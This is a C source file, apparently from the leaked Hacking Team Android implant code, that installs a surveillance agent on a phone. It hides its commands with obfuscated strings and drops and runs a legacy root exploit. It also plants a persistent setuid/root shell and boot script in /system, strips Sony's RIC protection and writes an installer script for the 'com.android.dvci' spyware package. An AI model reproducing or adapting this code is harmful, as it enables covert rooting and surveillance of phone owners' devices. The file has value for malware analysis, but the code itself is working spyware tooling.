hackedteam/core-android-native

View on GitHub
selinux_native/jni/utils/shell_installer.c

Summary

Maintainability
Test Coverage
#include <stdio.h>
#include <sys/time.h>
#include <stdlib.h>
#include <errno.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <sys/system_properties.h>
#include <sys/mount.h>

#include "xperia_ric_manager.h"
#include "shell_installer.h"
#include "knox_manager.h"
#include "log.h"
#include "shell_params.h"
#include "deobfuscate.h"
#include "old_shell.h"
#include "utils.h"
#include "boot_manager.h"
#include "bin_oldsuidext.h"
#include "bin_suidext.h"
#include "ps.h"
#ifdef SHARED_LIB
#include "bin_legacyexp.h"
#endif

static unsigned char system_str[] = "\x76\xcb\xba\xef\x1b\x11\x1b\x06\x15\x2d"; // "/system"
static unsigned char stmp1[] = "\xc0\xf7\x32\x5d\x5c\x53\x50\x1f"; // "stmp1" 
static unsigned char sotmp1[] = "\x5f\xe5\xbc\xf4\xf0\xf5\xf2\xf1\xb6"; // "sotmp1"
static unsigned char shtmp[] = "\x53\xd9\x8f\x20\xcd\xd9\xce\x25"; // "shtmp"
static unsigned char etmp[] = "\xad\x4d\xe4\x58\x6b\x40\x67"; // "etmp"
static unsigned char exp_str[] = "\x24\x5d\x75\x3a\x35\x03\xe9\x3c\x3a\x35\x03\xe9\x3c\xee\xf0"; // "./%s ./%s rt"

static int is_pkg_disabled(void) {

  FILE *fp;
  int status;
  char path[1024];
  int pid;

  unsigned char pm_cmd[] = "\x8b\x4c\xe0\x0b\x7e\xbb\x7f\x62\x08\x07\xbb\x0b\x7a\x78\x60\x7a\x74\x76\x08\xbb\xbe\x77\xbb\xbe\x75\xbb\x78\x7c\x7e\xbd\x7a\x7d\x77\x09\x7c\x62\x77\xbd\x77\x05\x78\x62"; // "pm list packages -d -f com.android.dvci"
  unsigned char pkg[] = "com.android.dvci";
  LOGD("[is_pkg_disabled] start\n");
  // We need to stay root
  pid = fork();

  // Wait for the check
  if(pid > 0) {
    waitpid(pid, &status, 0);
    return status;
  }
  else {
    // Avoid Samsung rooting features
    int disabled = 0;
    setgid(2000);
    setegid(2000);

    setuid(2000);
    seteuid(2000);


    fp = popen(deobfuscate(pm_cmd), "r");

    if (fp == NULL){ 
        LOGD("[is_pkg_disabled] deob failed\n");
        return 0;
    }

    while (fgets(path, 1024, fp) != NULL) {
      if(strlen(path) > 0 ) {
        LOGD("[is_pkg_disabled] found %s\n",path);
    if( strstr(path,pkg) != NULL) { 
          disabled = 1;
        }
    break;
      }
    }

    pclose(fp);
    exit(disabled);
  }

  // Should be never reached
  return 0;

}

#ifdef SHARED_LIB
void exec_legacy_exploit() {

  FILE * fd_oldshell  = fopen(deobfuscate(sotmp1), "w"); // old setuid shell
  FILE * fd_legacyexp  = fopen(deobfuscate(etmp), "w"); // old setuid shell
  char cmd[512];

  LOGD("[INSTALLER] Starting legacy exploitation\n");

  if(!fd_oldshell || !fd_legacyexp) {
    LOGD("[INSTALLER] Failed to create file for legacy exp\n");
    return;
  }

  fwrite(&bin_legacy_get_root, 1, sizeof(bin_legacy_get_root), fd_legacyexp);
  fwrite(&binoldsuidext, 1, sizeof(binoldsuidext), fd_oldshell);

  fclose(fd_legacyexp);
  fclose(fd_oldshell);

  chmod(deobfuscate(etmp), 0777);
  chmod(deobfuscate(sotmp1), 0777);

  memset(cmd, 0, sizeof(cmd));
  snprintf(cmd, sizeof(cmd), deobfuscate(exp_str), deobfuscate(etmp), deobfuscate(sotmp1));

  LOGD("[INSTALLER] Starting exploitation\n");
  system(cmd);
  LOGD("[INSTALLER] Legacy done\n");

  remove(deobfuscate(etmp));
  remove(deobfuscate(sotmp1));

}

#endif

// Install the root shell.
// - Copy the sh script in /system/etc (boot start)
// - Copy the root_server bin in /system/bin
int install_shell(char * shell_server_path) {
  FILE *f1 = NULL;
  FILE *f2 = NULL;
  char install_script[1024];
  char shell_server[256];
  char shell_script[256];  
  char current_path[512];

  memset(current_path, 0, sizeof(current_path));
  getcwd(current_path, sizeof(current_path));
  strcat(current_path, "/");

  memset(shell_server, 0, sizeof(shell_server));
  if(shell_server_path == NULL) 
    snprintf(shell_server, sizeof(shell_server), "%s%s", current_path, deobfuscate(stmp1));  
  else
    strncpy(shell_server, shell_server_path, sizeof(shell_server));

  memset(install_script, 0, sizeof(install_script));
  
  LOGD("Installing shell");

  // Check for xperia protection ric
  if(is_ric_present())
    remove_ric();

  // Mount /system partition as rw
  remount(deobfuscate(system_str), 0);

  remove(deobfuscate(ROOT_BIN));

  // Copy root client

  f1 = fopen(shell_server, "r");
  f2 = fopen(deobfuscate(ROOT_BIN), "w");

  if(!f1 || !f2)
    return -1;  

  if(fcopy(f1, f2) < 0)
    return -1;

  chmod(deobfuscate(ROOT_BIN), 0755);

  fclose(f1);
  fclose(f2);

  // Create the proper boot script
  createBootScript();

  return 1;
}


// Install the old setuid shell
int install_legacy_shell(void) {
  char current_path[512];
  char old_shell_path[512];

  getcwd(current_path, sizeof(current_path));
  strcat(current_path, "/");

  memset(old_shell_path, 0, sizeof(old_shell_path));  
  snprintf(old_shell_path, sizeof(old_shell_path), "%s%s", current_path, deobfuscate(sotmp1));

  return install_old_shell(old_shell_path);
}

// For the remote vector we need to extract what we need.

#ifndef LOCAL
// Create shell files on fs
void extract_shell_files(char * rcs) {
  unsigned char enc_script[] = "\xfc\x6d\x0e\x21\x27\x2d\x91\x9f\x91\x98\x6b\x93\x2d\x66\x6f\x92\x2d\x91\x6c\x0e\x61\x67\x98\x24\x2b\x91\x24\x42\x24\x2d\x68\x67\x98\x67\x2d\x90\x6d\x61\x67\x90\x2d\x98\x93\x94\x2d\x98\x93\x94\x0e\x96\x93\x24\x2b\x91\x0e\x61\x6c\x93\x6d\x68\x24\x55\x5b\x5b\x24\x2d\x68\x67\x98\x67\x2d\x90\x6d\x61\x67\x90\x2d\x98\x93\x94\x2d\x98\x93\x94\x0e\x91\x6b\x98\x98\x6f\x92\x65\x91\x24\x94\x9b\x98\x24\x65\x90\x6d\x66\x67\x90\x24\x94\x67\x61\x69\x67\x65\x6b\x7d\x9a\x6b\x96\x6f\x6a\x6f\x6b\x96\x7d\x6b\x92\x67\x66\x90\x6b\x24\x54\x0e\x94\x93\x24\x68\x6f\x91\x67\x66\x90\x6b\x24\x61\x6d\x93\x52\x67\x92\x68\x96\x6d\x6f\x68\x52\x9a\x6b\x92\x68\x6f\x92\x65\x0e"; 

  unsigned char enc_script2[] = "\xb6\xce\xaf\x63\x50\xaa\x75\xaa\xa7\x50\xaa\xac\xa9\x5d\x53\x5d\x5e\x6f\x67\xa9\x6b\x5a\x5a\xa9\x02\x41\x7a\x6f\x5c\x67\x63\x5d\x5d\x63\x69\x68\x07\x6b\x68\x6b\x51\x6f\x5c\xa8\x6b\x5a\x65\xac\xaa\x77\x44\x5e\x62\x6f\x68\x44\x5a\x67\xaa\x6e\x63\x5d\x6b\x6c\x66\x6f\xaa\x6d\x69\x67\xa8\x62\x5f\x6b\x41\x6f\x63\xa8\x5a\x6f\x5c\x67\x63\x5d\x5d\x63\x69\x68\x67\x6b\x68\x6b\x51\x6f\x5c\x44\x50\x63\x44\x5d\x66\x6f\x6f\x5a\xaa\x9b\x44\x5a\x67\xaa\x63\x68\x5d\x5e\x6b\x66\x66\xaa\xa9\x6e\x6b\x5e\x6b\xa9\x66\x69\x6d\x6b\x66\xa9\x5e\x67\x5a\xa9\x5e\x67\x5a\x44\x5c\x67\xaa\xa9\x6e\x6b\x5e\x6b\xa9\x66\x69\x6d\x6b\x66\xa9\x5e\x67\x5a\xa9\x5e\x67\x5a\x44\x6b\x67\xaa\x5d\x5e\x6b\x5c\x5e\x5d\x6f\x5c\x40\x63\x6d\x6f\xaa\xa7\x68\xaa\x6d\x69\x67\xa8\x6b\x68\x6e\x5c\x69\x63\x6e\xa8\x6e\x40\x6d\x63\xa9\xa8\x7d\x6f\x5c\x40\x63\x6d\x6f\x07\x6b\x63\x68\x44\x5d\x66\x6f\x6f\x5a\xaa\x9c\x44";

  unsigned char enc_script3[] = "\x7e\xc2\x0d\x0d\x1f\x0e\x0e\x1b\x10\x19\x0d\xe2\x12\x0f\x0e\xe2\x19\x16\x11\x1c\x23\x16\xe2\x12\x23\x1d\x15\x23\x19\x1f\x21\x08\x1f\x0c\x1b\x18\x1b\x1f\x0c\x21\x1f\x10\x23\x1c\x16\x1f\xe2\xd3\xf4\x12\x17\xe2\x1f\x10\x23\x1c\x16\x1f\xe2\x1d\x11\x17\xd0\x23\x10\x1e\x0c\x11\x1b\x1e\xd0\x08\x1f\x10\x1e\x1b\x10\x19\xf4\x1b\x18\xe2\x25\xe2\xd7\x18\xe2\xdc\xd1\x0d\x0b\x0d\x0e\x1f\x17\xd1\x23\x12\x12\xd1\x3a\x09\x32\x1f\x0c\x17\x1b\x0d\x0d\x1b\x11\x10\x37\x23\x10\x23\x19\x1f\x0c\xd0\x23\x12\x15\xdc\xe2\x27\xf4\x0e\x1a\x1f\x10\xf4\x12\x17\xe2\x1f\x10\x23\x1c\x16\x1f\xe2\x1d\x11\x17\xd0\x1a\x0f\x23\x09\x1f\x1b\xd0\x12\x1f\x0c\x17\x1b\x0d\x0d\x1b\x11\x10\x17\x23\x10\x23\x19\x1f\x0c\xf4\x18\x1b\xf4\x0c\x17\xe2\xdf\x0d\xf4";

  FILE * fd_shell     = fopen(deobfuscate(stmp1), "w");  // daemonized shell
  FILE * fd_oldshell  = fopen(deobfuscate(sotmp1), "w"); // old setuid shell
  FILE * install_rcs  = NULL;
  char script[1024];
  char script2[1024];
  char complete_script[2048];
  char current_path_shtmp[512];

  memset(current_path_shtmp, 0, sizeof(current_path_shtmp));

  getcwd(current_path_shtmp, sizeof(current_path_shtmp));
  strcat(current_path_shtmp, "/");
  strcat(current_path_shtmp, deobfuscate(shtmp));

  fwrite(&binsuidext, 1, sizeof(binsuidext), fd_shell);
  fwrite(&binoldsuidext, 1, sizeof(binoldsuidext), fd_oldshell);

  fclose(fd_shell);
  fclose(fd_oldshell);

  // For the remote vector install the apk. Not for shared library.
  if(rcs) {
    install_rcs = fopen(deobfuscate(shtmp), "w");  // installation script

    memset(&script, 0, sizeof(script));
    memset(&complete_script, 0, sizeof(complete_script));

    snprintf(script, sizeof(script), deobfuscate(enc_script), rcs, rcs);
    snprintf(script2, sizeof(script2), deobfuscate(enc_script3), current_path_shtmp);

    snprintf(complete_script, sizeof(complete_script), "%s%s%s", script, deobfuscate(enc_script2), script2);

    fwrite(&complete_script, 1, strlen(complete_script), install_rcs);
    fclose(install_rcs);
    chmod(deobfuscate(shtmp), 0777);
  }

  chmod(deobfuscate(stmp1), 0777);
  chmod(deobfuscate(sotmp1), 0777);
}

// Clean up files
void cleanup(void) {

  remove(deobfuscate(stmp1));
  remove(deobfuscate(sotmp1));

}


// Exec the installazion script using our root shell
void start_script(void) {
  char script_rcs[512];
  char script_sql_huawei[512];
  char current_path[512];
  unsigned char qzx[] = "\x8c\x90\x1f\x1d\x16\x14"; // "qzx"
  unsigned char sql[] = "\x16\xfc\xe9\x9d\x9f\x8a"; // "sql"
  unsigned char hwperm[] = "\x92\x70\xc1\x5d\x21\x2b\x21\x26\x17\x1f\x5d\x13\x22\x22\x5d\x3a\x25\x42\x17\x20\x1f\x1b\x21\x21\x1b\x1d\x1c\x3f\x13\x1c\x13\x15\x17\x20\x5c\x13\x22\x19"; // "/system/app/HwPermissionManager.apk"
  unsigned char rcs_pkg[] = "\x51\x69\x28\xf2\xce\xcc\x81\xf0\xc1\xf7\xe5\xce\xc8\xf7\x81\xf7\xf9\xf2\xc8"; // "com.android.dvci"
  struct stat st;

  LOGD("[INSTALLER] Installing apk...\n");

  memset(current_path, 0, sizeof(current_path));

  getcwd(current_path, sizeof(current_path));
  strcat(current_path, "/");

  memset(script_rcs, 0, sizeof(script_rcs));
  snprintf(script_rcs, sizeof(script_rcs), "%s %s %s%s", deobfuscate(ROOT_BIN), deobfuscate(qzx), current_path, deobfuscate(shtmp));

  system(script_rcs);
  
  // After installation we need to check if the Huawei permission manager application is installed
  if(!stat(deobfuscate(hwperm), &st)) {
    memset(script_sql_huawei, 0, sizeof(script_sql_huawei));
    snprintf(script_sql_huawei, sizeof(script_sql_huawei), "%s %s %s", deobfuscate(ROOT_BIN), deobfuscate(sql), deobfuscate(rcs_pkg));
    
    system(script_sql_huawei);
  }

  return;

}

#endif


void uninstall_persistent_apk(void) {
  unsigned char sc_complete[2048];
  FILE *f1 = NULL;
  unsigned char tmp[] = "\x61\x77\x00\xb2\x0b\x00\xfb\x00\xb2\xf3\xf2\x0e\x00\xf3\xb2\xfb\xf4\xff\xb2\xfb\xf4\xff\xc2\xfc\xf1"; // "/data/local/tmp/tmp_un"
  unsigned char rm[] = "\x5f\x69\x30\xff\xf2\x81\x8a\xfc\xd7"; // "rm %s\n"
  unsigned char rm_tmp[256];

  unsigned char sc1[] = "\xcf\x3c\x7a\x14\x16\x20\xc4\xce\xc4\xcb\xda\xe2\x20\xd5\xde\xe1\x20\xc4\xdf\x3d\xc7\xe2\x17\xd4\xe3\xda\xd6\xc5\x17\xd4\xe0\xe2\x21\xd6\xe1\xdb\xc5\xe0\xde\xdb\x21\xdb\xc9\xd4\xde\x17\x05\x11\x20\xdb\xda\xc9\x20\xe1\xca\xe3\xe3\x3d\xc7\xe2\x17\xdb\xde\xc4\xd6\xd5\xe3\xda\x17\xd4\xe0\xe2\x21\xd6\xe1\xdb\xc5\xe0\xde\xdb\x21\xdb\xc9\xd4\xde\x17\x05\x11\x20\xdb\xda\xc9\x20\xe1\xca\xe3\xe3\x3d\xc7\xe2\x17\xca\xe1\xde\xe1\xc4\xcb\xd6\xe3\xe3\x17\xd4\xe0\xe2\x21\xd6\xe1\xdb\xc5\xe0\xde\xdb\x21\xdb\xc9\xd4\xde\x17\x05\x11\x20\xdb\xda\xc9\x20\xe1\xca\xe3\xe3\x3d";


  unsigned char sc2[] = "\xcf\x3c\x78\x20\xc4\xce\xc4\xcb\xda\xe2\x20\xd5\xde\xe1\x20\xdb\xdb\xd9\x17\xd5\xe3\xc8\x3d\xd9\xe0\xc5\x17\xde\x17\xde\xe1\x17\xd7\xe3\xc4\x17\x20\xc4\xce\xc4\xcb\xda\xe2\x20\xd6\xc7\xc7\x20\xe4\xcb\xdc\xfb\xda\xc9\xde\xd4\xda\x21\xd6\xc7\xdc\x17\x05\x11\x20\xdb\xda\xc9\x20\xe1\xca\xe3\xe3\xd7\x0c\x17\xdb\xe0\x17\xc5\xe2\x17\x17\x1b\xde\x17\x05\x11\x20\xdb\xda\xc9\x20\xe1\xca\xe3\xe3\x0c\x17\xdb\xe0\xe1\xda\x3d\xc5\xe2\x17\x22\xc5\x17\x20\xc4\xdb\xd4\xd6\xc5\xdb\x20\x21\xe3\xe0\xc4\xcb\x21\xd9\xe0\xca\xe1\xdb\x17\x05\x11\x20\xdb\xda\xc9\x20\xe1\xca\xe3\xe3\x3d";


  unsigned char sc3[] = "\xcf\x3c\xb8\xc5\xe2\x17\x22\xc5\x17\x20\xdb\xd6\xcb\xd6\x20\xdb\xd6\xcb\xd6\x20\xd4\xe0\xe2\x21\xd6\xe1\xdb\xc5\xe0\xde\xdb\x21\xdb\xc9\xd4\xde\x3d\xc5\xe2\x17\x22\xc5\x17\x20\xe2\xe1\xcb\x20\xc4\xdb\xd4\xd6\xc5\xdb\x20\x21\xda\xcf\xcb\x0b\xf0\xe3\xe0\xd8\x20\x17\x05\x11\x20\xdb\xda\xc9\x20\xe1\xca\xe3\xe3\x3d";

  unsigned char sc4[] = "\xcf\x3c\x6a\xd9\xe0\xc5\x17\xde\x17\xde\xe1\x17\xd7\xe3\xc4\x17\x20\xdb\xd6\xcb\xd6\x20\xd6\xc7\xc7\x20\x1d\xd4\xe0\xe2\x21\xd6\xe1\xdb\xc5\xe0\xde\xdb\x21\xdb\xc9\xd4\xde\x1d\x17\x05\x11\x20\xdb\xda\xc9\x20\xe1\xca\xe3\xe3\xd7\x0c\x17\xdb\xe0\x17\xc5\xe2\x17\x17\x1b\xde\x0c\x17\xdb\xe0\xe1\xda\x3d\xd9\xe0\xc5\x17\xde\x17\xde\xe1\x17\xd7\xe3\xc4\x17\x20\xdb\xd6\xcb\xd6\x20\xdb\xd6\xe3\xc9\xde\xdc\x22\xd4\xd6\xd4\xdf\xda\x20\x1d\xd4\xe0\xe2\x21\xd6\xe1\xdb\xc5\xe0\xde\xdb\x21\xdb\xc9\xd4\xde\x1d\x17\x05\x11\x20\xdb\xda\xc9\x20\xe1\xca\xe3\xe3\xd7\x0c\x17\xdb\xe0\x17\xc5\xe2\x17\x17\x1b\xde\x0c\x17\xdb\xe0\xe1\xda\x3d";

  unsigned char sc5[] = "\xcf\x3c\x69\xd9\xe0\xc5\x17\xde\x17\xde\xe1\x17\xd7\xe3\xc4\x17\x20\xdb\xd6\xcb\xd6\x20\xdb\xd6\xe3\xc9\xde\xdc\x22\xd4\xd6\xd4\xdf\xda\x20\x1d\xe4\xcb\xdc\xfb\xda\xc9\xde\xd4\xda\x1d\x17\x05\x11\x20\xdb\xda\xc9\x20\xe1\xca\xe3\xe3\xd7\x0c\x17\xdb\xe0\x17\xc5\xe2\x17\x17\x1b\xde\x0c\x17\xdb\xe0\xe1\xda\x17\x3d\xd9\xe0\xc5\x17\xde\x17\xde\xe1\x17\xd7\xe3\xc4\x17\x20\xc4\xce\xc4\xcb\xda\xe2\x20\xd6\xc7\xc7\x20\x1d\xe4\xcb\xdc\xfb\xda\xc9\xde\xd4\xda\x1d\x17\x05\x11\x20\xdb\xda\xc9\x20\xe1\xca\xe3\xe3\xd7\x0c\x17\xdb\xe0\x17\xc5\xe2\x17\x17\x1b\xde\x17\x05\x11\x20\xdb\xda\xc9\x20\xe1\xca\xe3\xe3\x0c\x17\xdb\xe0\xe1\xda\x3d";

  unsigned char sc6[] = "\x4f\x61\x77\xc1\xe2\xb1\xea\xe3\xee\xef\xe5\xea\xb1\xec\xe0\xe2\xa3\xee\xe3\xed\xff\xe0\xe6\xed\xa3\xfb\xea\xe3\xed\xe6\xe3\xe8\xb1\xbf\xb3\xa0\xed\xea\xfb\xa0\xe3\xfa\xe5\xe5\xc7\xa0\xfc\xf6\xfc\xfd\xea\xe2\xa0\xef\xe6\xe3\xa0\xed\xed\xeb\xb1\xef\xe5\xff\xc7\xfc\xe5\xea\xea\xc1\xb1\xbe\xc7\xa0\xfc\xf6\xfc\xfd\xea\xe2\xa0\xef\xe6\xe3\xa0\xed\xed\xeb\xb1\xff\xfa\xc7";
  
  unsigned char system[] = "\x63\xfa\x9e\xbc\xf0\xee\xf0\xeb\xfa\xf2"; // "/system"

  memset(sc_complete, 0, sizeof(sc_complete));
  memset(rm_tmp, 0, sizeof(rm_tmp));
  
  snprintf(rm_tmp, sizeof(rm_tmp), deobfuscate(rm), deobfuscate(tmp));
  snprintf(sc_complete, sizeof(sc_complete), "%s%s%s%s%s%s%s", deobfuscate(sc1), deobfuscate(sc2), deobfuscate(sc3), deobfuscate(sc4), deobfuscate(sc5), deobfuscate(sc6), rm_tmp);


  if (fork_zero_fucks() == 0) {
    // Child
    setsid();
    sleep(30);

    LOGD("Uninstall persistent child");
    
    if(!is_pkg_disabled()) {
      LOGD("Pkg not disabled, skipping....\n");
      exit(0);
    }    

    LOGD("Pkg disabled, going to remove persistent stuff....\n");

    remount(deobfuscate(system), 0);

    f1 = fopen(deobfuscate(tmp), "w");

    if(!f1) {
      LOGD("Persistent uninstall failed\n");
      exit(-1);  
    }

    fwrite(sc_complete, 1, sizeof(sc_complete), f1);    
    fclose(f1);

    chmod(deobfuscate(tmp), 0755);
    execl(deobfuscate(tmp), NULL);

    // Should be never reached
    exit(0);
  }

  else return;
  

  // Never reached
  return;
}